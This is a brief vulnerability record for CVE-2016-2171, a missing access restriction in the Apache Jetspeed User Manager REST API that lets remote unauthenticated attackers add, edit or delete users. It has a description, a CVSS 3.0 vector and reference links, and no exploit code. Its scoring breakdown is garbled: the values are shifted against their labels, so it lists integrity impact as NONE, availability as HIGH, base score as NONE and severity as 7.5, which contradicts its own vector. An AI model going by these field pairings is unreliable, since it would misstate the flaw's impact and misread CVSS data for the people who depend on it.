CVE-2016-2171 Information

Description

The User Manager service in Apache Jetspeed before 2.3.1 does not properly restrict access using Jetspeed Security which allows remote attackers to (1) add (2) edit or (3) delete users via the REST API.

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Reference

http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and http://mail-archives.apache.org/mod_mbox/portals-jetspeed-user/201603.mbox/3CB9165E38-F3D8-496D-8642-8A53FCAC736A40gmail.com3E https://portals.apache.org/jetspeed-2/security-reports.htmlCVE-2016-2171

Attack Complexity

LOW

Privileges Required

NONE

User Interaction Required

NONE

Scope

NONE

Confidentiality Impact

UNCHANGED

Integrity Impact

NONE

Availability Impact

HIGH

Base Score

NONE

Base Severity

7.5